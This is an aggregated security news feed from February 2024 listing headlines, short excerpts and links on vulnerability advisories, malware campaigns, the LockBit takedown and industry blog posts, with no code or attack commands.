Apple has released its new PQ3 (post-quantum) cryptographic protocol, claimed to be the first-ever messaging protocol to reach Level 3 security. Apple announced its cryptographic protocol change in 2019 when it shifted from RSA to Elliptic Curve Cryptography (ECC), and several upgrades were made. “PQ3 introduces a new post-quantum encryption key in the set of […] The post Apple Adds PQ3 post-quantum Encryption for iMessage appeared first on Cyber Security News.
https://cybersecuritynews.com/apple-pq3-post-quantum-imessage/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits
SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.Features CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database. EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization. PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding...
http://www.kitploit.com/2024/02/sploitscan-sophisticated-cybersecurity.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Signal to shield user phone numbers by default
Chat app Signal will shield users' phone numbers by default from now on. Check whether you need to change your settings to adapt to the new version
https://www.malwarebytes.com/blog/news/2024/02/signal-to-shield-user-phone-numbers-by-default
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hackers launched 250,000+ Attacks to Exploit Ivanti VPN 0-Day
Ivanti Connect Secure vulnerabilities were disclosed in January 2024 as a potential gateway for threat actors to penetrate corporate networks. The two vulnerabilities, CVE-2023-46805 and CVE-2024-21887 were associated with authentication bypass and arbitrary command execution. Combining these two could result in an unauthenticated remote command execution on affected systems. However, Ivanti addressed these vulnerabilities in […] The post Hackers launched 250,000+ Attacks to Exploit Ivanti VPN 0-Day appeared first on Cyber Security News.
https://cybersecuritynews.com/hackers-launched-250000-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hackers Heavily Abusing Google Cloud Run to Deliver Banking Malware
Large-scale malware distribution campaigns are abusing Google Cloud Run to transmit banking trojans, including Astaroth (also known as Guildma), Mekotio, and Ousaban, to European and Latin American targets. With Cloud Run, you can promptly execute your code on top of Google’s scalable infrastructure due to a fully managed platform. It enables the operation of front-end […] The post Hackers Heavily Abusing Google Cloud Run to Deliver Banking Malware appeared first on Cyber Security News.
https://cybersecuritynews.com/hackers-heavily-abusing-google-cloud/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple Approves Fake App Before Real Rabby Wallet, Users' Funds Stolen
By Waqas Crypto Nightmare! Fake Rabby Wallet App Steals Millions After Apple App Store Fails to Catch It. This is a post from HackRead.com Read the original post: Apple Approves Fake App Before Real Rabby Wallet, Users’ Funds Stolen
https://www.hackread.com/apple-approves-fake-app-before-real-rabby-wallet/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

VoltSchemer – Wireless Charger Attack Boils Phone and Injects Voice Commands
Threat actors target wireless chargers for multiple malicious activities, such as implanting malware or conducting power-related attacks. The rising popularity of wireless charging brings convenience. Still, recent research by Zihao Zhan, Yirui Yang, Haoqi Shan, Hanqiu Wang, Yier Jin, and Shuo Wang from the University of Florida and CertiK uncovered vulnerabilities.  They discovered that electromagnetic […] The post VoltSchemer – Wireless Charger Attack Boils Phone and Injects Voice Commands appeared first on Cyber Security News.
https://cybersecuritynews.com/voltschemer-wireless-charger-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Wyze webcam Flaw let strangers see into some users' homes
Five months after a similar issue, Wyze cameras are back in the headlines for a privacy nightmare.  The Verge reports that dozens of users could see images from strangers’ homes, raising serious concerns about the security of these popular devices. At least 12 users reported seeing thumbnails from cameras they didn’t own in their Wyze […] The post Wyze webcam Flaw let strangers see into some users' homes appeared first on Cyber Security News.
https://cybersecuritynews.com/wyze-webcam-flaw/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Mustang Panda campaign targets Asia with a backdoor dubbed DOPLUGS
China-linked APT group Mustang Panda targeted various Asian countries with a variant of the PlugX (aka Korplug) backdoor dubbed DOPLUGS. Trend Micro researchers uncovered a cyberespionage campaign, carried out by China-linked APT group Mustang Panda, targeting Asian countries, including Taiwan, Vietnam, and Malaysia. Mustang Panda has been active since at least 2012, it targeted American and European entities such […]
https://securityaffairs.com/159464/apt/mustang-panda-doplugs-backdoor.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6649-1: Firefox vulnerabilities
Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2024-1547, CVE-2024-1548, CVE-2024-1549, CVE-2024-1550, CVE-2024-1553, CVE-2024-1554, CVE-2024-1555, CVE-2024-1557) Alfred Peters discovered that Firefox did not properly manage memory when storing and re-accessing data on a networking channel. An attacker could potentially exploit this issue to cause a denial of service. (CVE-2024-1546) Johan Carlsson discovered that Firefox incorrectly handled Set-Cookie response headers in multipart HTTP responses. An attacker could potentially exploit this issue to inject arbitrary cookie...
https://ubuntu.com/security/notices/USN-6649-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6648-1: Linux kernel vulnerabilities
It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51781) Zhenghan Wang discovered that the generic ID allocator implementation in the Linux kernel did not properly check for null bitmap when releasing IDs. A local attacker could use this to cause a denial of service (system crash). (CVE-2023-6915) Robert Morris discovered that the CIFS network file system implementation in the Linux kernel did not properly validate certain server commands fields, leading to an out-of-bounds read vulnerability. An attacker could use this to cause a denial of service (system crash) or possibly...
https://ubuntu.com/security/notices/USN-6648-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)
CVE-2024-1708 and CVE-2024-1709 affect ConnectWise remote desktop application ScreenConnect. This Threat Brief covers attack scope and includes our telemetry. The post Threat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/connectwise-threat-brief-cve-2024-1708-cve-2024-1709/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Facebook Marketplace - 77,267 breached accounts
In February 2024, 200k Facebook Marketplace records allegedly obtained from a Meta contractor in October 2023 were posted to a popular hacking forum. The data contained 77k unique email addresses alongside names, phone numbers, Facebook profile IDs and geographic locations. The data also contained bcrypt password hashes, although there is no indication these belong to the corresponding Facebook accounts.
https://haveibeenpwned.com/PwnedWebsites#FacebookMarketplace
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu à J-2 (Presse spécialisée)

Joomla fixes XSS flaws that could expose sites to RCE attacks
Five vulnerabilities have been discovered in the Joomla content management system that could be leveraged to execute arbitrary code on vulnerable websites. [...]
https://www.bleepingcomputer.com/news/security/joomla-fixes-xss-flaws-that-could-expose-sites-to-rce-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft expands free logging capabilities after May breach
Microsoft has expanded free logging capabilities for all Purview Audit standard customers, including U.S. federal agencies, six months after disclosing that Chinese hackers stole U.S. government emails undetected in an Exchange Online breach between May and June 2023. [...]
https://www.bleepingcomputer.com/news/security/microsoft-expands-free-logging-capabilities-after-may-breach/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

US GOV OFFERS A REWARD OF UP TO M FOR INFO ON LOCKBIT GANG MEMBERS AND AFFILIATES
U.S. government offers rewards of up to million for information that could lead to the identification or location of LockBit ransomware gang members and affiliates. The U.S. Department of State is offering a reward of up to million for information leading to the identification or location of members of the Lockbit ransomware gang and […]
https://securityaffairs.com/159454/cyber-crime/lockbit-members-reward.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why SBOMs are essential for every organization
In the complicated balancing act of rapid software development and robust cybersecurity, software bills of materials (SBOMs) serve a valuable function to help secure the intricate and vast systems that constitute software supply chains.
https://blog.sonatype.com/why-sboms-are-essential-for-every-organization
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Types of SaaS Applications: Categories and Examples
By Uzair Amir Learn about different types of SaaS solutions and the most widely used SaaS categories to create your own… This is a post from HackRead.com Read the original post: Types of SaaS Applications: Categories and Examples
https://www.hackread.com/types-of-saas-applications-categories-and-examples/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Top Software Development Outsourcing Trends
By Uzair Amir Eastern Europe is swiftly rising to prominence in the software development outsourcing sector. This ascendance is marked not… This is a post from HackRead.com Read the original post: Top Software Development Outsourcing Trends
https://www.hackread.com/top-software-development-outsourcing-trends/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What to Look for in a Secrets Scanner
Find out the key capabilities of secret scanners and what to consider when searching for a solution. 
https://www.legitsecurity.com/blog/what-to-look-for-in-a-secrets-scanner
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security
By Deeba Ahmed Migo Malware Campaign: User-Mode Rootkit Hides Cryptojacking on Linux Systems. This is a post from HackRead.com Read the original post: New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security
https://www.hackread.com/linux-malware-migo-exploits-redis-cryptojacking/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to stay safe from repo-jacking
Repo-jacking is a specific type of supply chain attack. This blog post explains what it is, what the risk is, and what you can do to stay safe. The post How to stay safe from repo-jacking appeared first on The GitHub Blog.
https://github.blog/2024-02-21-how-to-stay-safe-from-repo-jacking/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Proofpoint Welcomes New Executives to its Leadership Team

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-welcomes-new-executives-its-leadership-team
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Crypto Exchange FixedFloat Hacked: Million in BTC, ETH Stolen
By Deeba Ahmed FixedFloat suffered a significant loss of over 1,700 Ethereum and over 400 Bitcoin due to a drainer attack on February 18, 2024. This is a post from HackRead.com Read the original post: Crypto Exchange FixedFloat Hacked: Million in BTC, ETH Stolen
https://www.hackread.com/crypto-exchange-fixedfloat-hacked-btc-eth-stolen/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Building a Better Perimeter Defense Strategy to Meet the Challenges of 2024
By Yiyi Miao, Chief Product Officer, OPSWAT In the ever-changing domain of cybersecurity, organizations continue to face multifaceted challenges with protecting their digital assets and infrastructure. A new report, written […] The post Building a Better Perimeter Defense Strategy to Meet the Challenges of 2024 appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/building-a-better-perimeter-defense-strategy-to-meet-the-challenges-of-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Redis miner Migo uses novel system weakening techniques
A new malware campaign targets Redis servers to deploy the mining crypto miner Migo on compromised Linux hosts. Caro Security researchers have observed a new malware campaign targeting Redis servers with a crypto miner dubbed Migo. The campaign stands out for the use of several novel system weakening techniques against the data store itself.  Migo […]
https://securityaffairs.com/159447/malware/redis-miner-migo.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Understanding GDPR and the Importance of Employee Training
The General Data Protection Regulation (GDPR) has significantly impacted how European businesses collect, store, use,… Understanding GDPR and the Importance of Employee Training on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/21/understanding-gdpr-and-the-importance-of-employee-training/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Adarma Collaborates with Scottish Enterprise to Unveil Neurodiversity Strategy
Adarma has today announced its neurodiversity strategy in partnership with Scottish Enterprise, Scotland's national economic development agency. The strategy supports Adarma's continued commitment to attract, support, and empower people from diverse backgrounds into the cybersecurity sector, which will help combat the well-documented skills shortage in the cybersecurity sector. Adarma employs over 300 people and believes […] The post Adarma Collaborates with Scottish Enterprise to Unveil Neurodiversity Strategy first appeared on IT Security Guru. The post Adarma Collaborates with Scottish Enterprise to Unveil Neurodiversity Strategy appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/21/adarma-collaborates-with-scottish-enterprise-to-unveil-neurodiversity-strategy/?utm_source=rss&utm_medium=rss&utm_campaign=adarma-collaborates-with-scottish-enterprise-to-unveil-neurodiversity-strategy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity Salary Guide: How Much Can You Earn?
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full Story in Forbes Sausalito, Calif. – Feb. 21, 2024 Forbes reports that as technology becomes further ingrained in daily life, cyberattacks continue to threaten businesses. Bad actors deploy new tools like artificial The post Cybersecurity Salary Guide: How Much Can You Earn? appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybersecurity-salary-guide-how-much-can-you-earn/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6647-1: Linux kernel vulnerabilities
It was discovered that a race condition existed in the ATM (Asynchronous Transfer Mode) subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51780) It was discovered that a race condition existed in the Rose X.25 protocol implementation in the Linux kernel, leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51782) It was discovered that the netfilter connection tracker for netlink in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service...
https://ubuntu.com/security/notices/USN-6647-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Year, New Consumer Demands in Cybersecurity: Navigating the Landscape of Consumer Expectations and App Developer Responsibility in Mobile App Security
By Alan Bavosa, VP of Security Products, Appdome The significant growth and mass adoption of mobile applications has completely transformed the way users engage with brands today. From managing finances […] The post New Year, New Consumer Demands in Cybersecurity: Navigating the Landscape of Consumer Expectations and App Developer Responsibility in Mobile App Security appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/new-year-new-consumer-demands-in-cybersecurity-navigating-the-landscape-of-consumer-expectations-and-app-developer-responsibility-in-mobile-app-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vibrator virus steals your personal information
One of our customers found their vibrator was buzzing with a hint of malware.
https://www.malwarebytes.com/blog/news/2024/02/vibrator-virus-steals-your-personal-information
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Critical flaw found in deprecated VMware EAP. Uninstall it immediately
VMware urges customers to uninstall the deprecated Enhanced Authentication Plugin (EAP) after the disclosure of a critical flaw CVE-2024-22245. VMware is urging users to uninstall the deprecated Enhanced Authentication Plugin (EAP) after the discovery of an arbitrary authentication relay flaw CVE-2024-22245 (CVSS score: 9.6). A threat actor could trick a domain user with EAP installed in […]
https://securityaffairs.com/159441/security/critical-flaw-deprecated-vmware-eap.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SpeedyTest - Command-Line Tool For Measuring Internet Speed
SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job. Features Measure download speed, upload speed, and ping latency. Generate detailed reports with graphical representation of speed test results. Save and export test results in various formats (CSV, JSON, etc.). Customize speed test parameters and server selection. Compare speed test results over time to track performance changes. Integrate SpeedyTest into your own applications using the provided API. track your timeline with saved database Installation...
http://www.kitploit.com/2024/02/speedytest-command-line-tool-for.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A first analysis of the i-Soon data leak
Data from a Chinese cybersecurity vendor that works for the Chinese government exposed a range of hacking tools and services.
https://www.malwarebytes.com/blog/news/2024/02/a-first-analysis-of-the-i-soon-data-leak
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6584-2: Libspf2 vulnerabilities
USN-6584-1 fixed several vulnerabilities in Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. This update provides the corresponding updates for CVE-2021-33912 and CVE-2021-33913 in Ubuntu 16.04 LTS. We apologize for the inconvenience. Original advisory details: Philipp Jeitner and Haya Shulman discovered that Libspf2 incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service or execute arbitrary code. (CVE-2021-20314) It was discovered that Libspf2 incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service...
https://ubuntu.com/security/notices/USN-6584-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Exchange flaw CVE-2024-21410 could impact up to 97,000 servers
Researchers from Shadowserver Foundation identified roughly 28,000 internet-facing Microsoft Exchange servers vulnerable to CVE-2024-21410. The vulnerability CVE-2024-21410 is a bypass vulnerability that can be exploited by an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both. […]
https://securityaffairs.com/159424/hacking/28000-vulnerable-microsoft-exchange-servers.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Latest DevSecOps Guidance from Cloud Security Alliance and SAFECode Emphasizes Value of Collaboration, Integration in DevSecOps Landscape
Document provides practical insights for seamlessly embedding security in DevOps processes and workflow and examines convergence of DevSecOps with Zero Trust, MLSecOps, and AIOps SEATTLE – Feb. 21, 2024 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications, and best practices to help ensure a secure cloud computing environment, today released The Six Pillars of DevSecOps - Collaboration and Integration. Written by CSA's DevSecOps...
https://cloudsecurityalliance.org/articles/latest-devsecops-guidance-from-cloud-security-alliance-and-safecode-emphasizes-value-of-collaboration-integration-in-devsecops-landscape
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu des jours précédents

Brightening the outlook for security in the cloud
The NCSC's Cloud Security Research Lead suggests some approaches to help you get confidence in cloud services.
https://www.ncsc.gov.uk/blog-post/brightening-outlook-security-cloud
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

An RFC on IoCs – playing our part in international standards
The NCSC has published a new RFC on Indicators of Compromise to support cyber security in protocol design - and hopes to encourage more cyber defenders to engage with international standards.
https://www.ncsc.gov.uk/blog-post/rfc-indicators-of-compromise-for-ietf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ConnectWise fixed critical flaws in ScreenConnect remote access tool
ConnectWise addressed two critical vulnerabilities in its ScreenConnect remote desktop access product and urges customers to install the patches asap. ConnectWise warns of the following two critical vulnerabilities in its ScreenConnect remote desktop access product: Both vulnerabilities were reported on February 13, 2024, through the company vulnerability disclosure channel via the ConnectWise Trust Center. The […]
https://securityaffairs.com/159416/security/connectwise-fixed-critical-bugs.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mastering SBOMs: Demonstrations
In our recent webinar, Mastering SBOMs: Demonstrations, speakers, including Ilkka Turunen, Field CTO, Sonatype, Robert Haas, Global DevSecOps Product Manager, DXC Technology, and Marc Luescher, Solution Architect, AWS, highlighted real-world applications of software bills of materials (SBOMs) through case studies and provided uses cases for SBOM optimization.
https://blog.sonatype.com/mastering-sboms-demonstrations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6646-1: Linux kernel vulnerabilities
It was discovered that a race condition existed in the ATM (Asynchronous Transfer Mode) subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51780) It was discovered that a race condition existed in the Rose X.25 protocol implementation in the Linux kernel, leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2023-51782) It was discovered that the netfilter connection tracker for netlink in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service...
https://ubuntu.com/security/notices/USN-6646-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

High-Risk Vulnerabilities in ConnectWise ScreenConnect
On February 19, 2024 ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect 23.9.7 and earlier.
https://blog.rapid7.com/2024/02/20/etr-high-risk-vulnerabilities-in-connectwise-screenconnect/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ThreatDown EDR update: Streamlined Suspicious Activity investigation
Investigating EDR alerts just got a whole lot easier.
https://www.malwarebytes.com/blog/business/2024/02/threatdown-edr-update-streamlined-suspicious-activity-investigation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6645-1: Linux kernel vulnerability
It was discovered that the netfilter connection tracker for netlink in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion).
https://ubuntu.com/security/notices/USN-6645-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decoding the Characteristics of Modern Pentesting: Speed
HackerOne pentest experts explore the "Speed" factor of effective pentesting methods to see how each security testing alternative measures up.
https://www.hackerone.com/penetration-testing/modern-pentesting-speed
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Law enforcement trolls LockBit, reveals massive takedown
Law enforcement has humiliated the humiliators.
https://www.malwarebytes.com/blog/business/2024/02/law-enforcement-trolls-lockbit-reveals-massive-takedown
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Webinar: Managing Without Governing? Why Your Organization Needs a Management System to Govern Your Information Resilience Program
The post Webinar: Managing Without Governing? Why Your Organization Needs a Management System to Govern Your Information Resilience Program appeared first on Cyber Defense Magazine.
https://cyberdefensewebinars.com/managing-without-governing-why-your-organization-needs-a-management-system-to-govern-your-information-resilience-program/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

North Carolina Man Loses 0,000 Of Savings In Crypto Investment Scheme
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the Full Cybercrime Magazine Podcast Interview Sausalito, Calif. – Feb. 20, 2024 Jim Wilkerson of Cary, N.C. is out 0,000 after he thought he found a great investment opportunity. He’s sharing his The post North Carolina Man Loses 0,000 Of Savings In Crypto Investment Scheme appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/north-carolina-man-loses-790000-of-savings-in-crypto-investment-scheme/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Feds Seize LockBit Ransomware Websites, Offer Decryption Tools, Troll Affiliates
U.S. and U.K. authorities have seized the darknet websites run by LockBit, a prolific and destructive ransomware group that has claimed more than 2,000 victims worldwide and extorted over 0 million in payments. Instead of listing data stolen from ransomware victims who didn't pay, LockBit's victim shaming website now offers free recovery tools, as well as news about arrests and criminal charges involving LockBit affiliates.
https://krebsonsecurity.com/2024/02/feds-seize-lockbit-ransomware-websites-offer-decryption-tools-troll-affiliates/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Explanation of New Authenticated Scanning PCI DSS Requirement 11.3.1.2 in PCI DSS V4.0 and how InsightVM can help meet the Requirement
As a Certified Qualified Security Assessor (QSA) company and a trusted Rapid7 partner, MegaplanIT is committed to guiding organizations through the complexities of compliance and security standards.
https://blog.rapid7.com/2024/02/20/explanation-of-new-authenticated-scanning-pci-dss-requirement-11-3-1-2-in-pci-dss-v4-0-and-how-insightvm-can-help-meet-the-requirement/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Navigating NIS2 requirements with Microsoft Security solutions
​​NIS2 is the most comprehensive European cybersecurity directive yet, covering 18 sectors and 160,000+ companies. The Zero Trust principles addressed by Microsoft Security solutions can help you protect your organization and meet NIS2 requirements. The post Navigating NIS2 requirements with Microsoft Security solutions appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/02/20/navigating-nis2-requirements-with-microsoft-security-solutions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How The Security of The Cloud's Supply Chain Will Shift in 2024
What we can expect from advanced threat actor groups in the new year. By Jason Martin, Co-founder and Co-CEO at Permiso Security In 2023, we started to witness a change […] The post How The Security of The Cloud's Supply Chain Will Shift in 2024 appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/how-the-security-of-the-clouds-supply-chain-will-shift-in-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decrypted: HomuWitch Ransomware
HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users - individuals - rather than institutions and companies. The post Decrypted: HomuWitch Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-homuwitch-ransomware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics
Fundamental insights from Unit 42's 2024 Incident Response report are summarized here. The post 2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics appeared first on Unit 42.
https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How I got started: Cyber AI/ML engineer
As generative AI goes mainstream, it highlights the increasing demand for AI cybersecurity professionals like Maria Pospelova. Pospelova is currently a senior data scientist, and data science team lead at OpenText Cybersecurity. She also worked at Interest, an AI cybersecurity company acquired by MicroFocus and then by OpenText. She continues as part of that team […] The post How I got started: Cyber AI/ML engineer appeared first on Security Intelligence.
https://securityintelligence.com/articles/how-i-got-started-cyber-ai-ml-engineer/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Wyze cameras show the wrong feeds to customers. Again.
Wyze cameras allowed users access to other users' feeds once again. An estimated 13,000 people got a peek at thumbnails from another user's home.
https://www.malwarebytes.com/blog/news/2024/02/wyze-cameras-show-the-wrong-feeds-to-customers-again
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hyperautomation: Revolutionizing the Security Market
By Divakar Kolhe, Digital Marketer, Market Research Future (Part of Wantstats Research and Media Private Limited) Hyperautomation: Revolutionizing the Security Market In today’s digital age, the security landscape is constantly […] The post Hyperautomation: Revolutionizing the Security Market appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/hyperautomation-revolutionizing-the-security-market/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6625-3: Linux kernel (Raspberry Pi) vulnerabilities
Marek Marczykowski-Górecki discovered that the Xen event channel infrastructure implementation in the Linux kernel contained a race condition. An attacker in a guest VM could possibly use this to cause a denial of service (paravirtualized device unavailability). (CVE-2023-34324) Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driver in the Linux kernel during device removal. A privileged attacker could use this to cause a denial of service (system crash). (CVE-2023-35827) It was discovered that a race condition existed in the Linux kernel when performing operations with kernel objects, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2023-45863) 黄思聪 discovered that the...
https://ubuntu.com/security/notices/USN-6625-3
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malvertising: This cyberthreat isn't on the dark web, it's on Google
Malvertising made a resurgence in 2023, with cybercriminals creating malicious ads and websites imitating Amazon, TradingView, and Rufus.
https://www.malwarebytes.com/blog/news/2024/02/malvertising-this-cyberthreat-isnt-on-the-dark-web-its-on-google
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Raccoon Infostealer operator extradited to the United States
A Ukrainian national that is being accused of operating the Raccoon Infostealer in a Malware-as-a-Service has been extradited to the US.
https://www.malwarebytes.com/blog/news/2024/02/raccoon-infostealer-operator-extradited-to-the-united-states
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Zoom Patched Multiple Security Vulnerabilities With Latest Update
The latest Zoom release addressed numerous security vulnerabilities in the software, including a critical flaw.… Zoom Patched Multiple Security Vulnerabilities With Latest Update on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/20/zoom-patched-multiple-security-vulnerabilities-with-latest-update/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Patch Tuesday For February Addressed Two Zero-Days
Heads up, Microsoft users! It's now time to update your devices as Microsoft rolled out… Microsoft Patch Tuesday For February Addressed Two Zero-Days on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/20/microsoft-patch-tuesday-for-february-addressed-two-zero-days/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Gold Pickaxe Malware Aims To Steal Users' Faces
Another threat surfaces online for mobile phone users that targets Android and iOS devices alike.… New Gold Pickaxe Malware Aims To Steal Users' Faces on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/20/new-gold-pickaxe-malware-aims-to-steal-users-faces/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ivanti Patched Another Vulnerability While The Former Went Under Attack
While the patches have been released, Ivanti users must rush to update their systems with… Ivanti Patched Another Vulnerability While The Former Went Under Attack on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/02/20/ivanti-patched-another-vulnerability-while-the-former-went-under-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sensor Intel Series: Top CVEs in January 2024
More IoT Targeting, plus a bunch of new CVEs! See what attackers went after in January 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-january-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LockBit, the world’s worst ransomware, is down
LockBit's position as ransomware's biggest beast is suddenly in doubt.
https://www.malwarebytes.com/blog/cybercrime/2024/02/lockbit-the-worlds-worst-ransomware-is-down
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6644-1: LibTIFF vulnerabilities
